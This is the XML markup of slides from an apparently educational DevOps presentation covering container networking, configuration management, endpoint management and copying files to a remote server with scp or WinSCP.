                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://ip:port/user/&lt;username&gt;/configure</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="688"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://51.89.251.32:8080/user/admin/configure</a:t>
            </a:r>
            <a:endParaRPr sz="2850">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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4" name="Shape 3574"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3575" name="Google Shape;3575;p577"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="24133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020">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per Container Per Service/Applications</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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9" name="Shape 3579"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3580" name="Google Shape;3580;p578"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="775200"/>
            <a:ext cx="8520600" cy="35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By default containers are isolated, means all ports are closed, so container can not talk to each other</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>But ….Some way by which container can talk to each other.</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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579"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="767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20">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are 2 ways</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3586" name="Google Shape;3586;p579"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3033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sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Expose the port of container, and allow containers to talk to each other with host OS. ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not r</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Put the containers inside same network.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recommended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3590"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3591" name="Google Shape;3591;p580"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474525" y="305750"/>
            <a:ext cx="8376300" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="97826"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Configuration management</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3592" name="Google Shape;3592;p580"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402375" y="1245350"/>
            <a:ext cx="8520600" cy="2433300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Configuration management refers to the task or process, in which we track and control changes to a managed systems, keeping integrity in place. Managed systems can include software, servers, infrastructure components, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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6" name="Shape 3596"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3597" name="Google Shape;3597;p58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sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>What will happen if we do not have CM?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3598" name="Google Shape;3598;p5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3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Modern IT systems are often deployed in a large-scale manner including on cloud and on-premises using automation. Think about what will happen, if we can not keep track of configuration! Furthermore, it can lead to increased risk if we do it manually.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3602"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3603" name="Google Shape;3603;p58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sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>What is the Benefit of CM?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3604" name="Google Shape;3604;p5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3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The primary benefit of configuration management is the consistency of managed systems. If we have an automated system in place to take care of CM, then you can sleep peacefully.</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3608"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3609" name="Google Shape;3609;p583"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-193950" y="187725"/>
            <a:ext cx="9276900" cy="854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SzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unified Endpoint Management System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3610" name="Google Shape;3610;p583"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465225" y="2443825"/>
            <a:ext cx="4075800" cy="9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Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limited with only Servers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3611" name="Google Shape;3611;p583"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254400" y="3704844"/>
            <a:ext cx="1832001" cy="732156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3612" name="Google Shape;3612;p583"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3207207" y="3619000"/>
            <a:ext cx="930825" cy="1086623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3613" name="Google Shape;3613;p583"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283850" y="3619000"/>
            <a:ext cx="930825" cy="1018425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3614" name="Google Shape;3614;p583"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3609" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3086400" y="1041825"/>
            <a:ext cx="1358100" cy="1358400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3615" name="Google Shape;3615;p583"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4444500" y="1032975"/>
            <a:ext cx="1674900" cy="1401600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3616" name="Google Shape;3616;p583"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011825" y="2548775"/>
            <a:ext cx="2716500" cy="14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All Devices</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mobile,Tv,Servers,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tablet,laptop,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>desktop,iphone,ipad etc..</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151525" y="445025"/>
            <a:ext cx="8680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120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to send file to a remote server?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;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38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>1. SCP (Secure Copy)</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>cp -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> portno source user@ip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>/destination</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>2. WinSCP Software</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
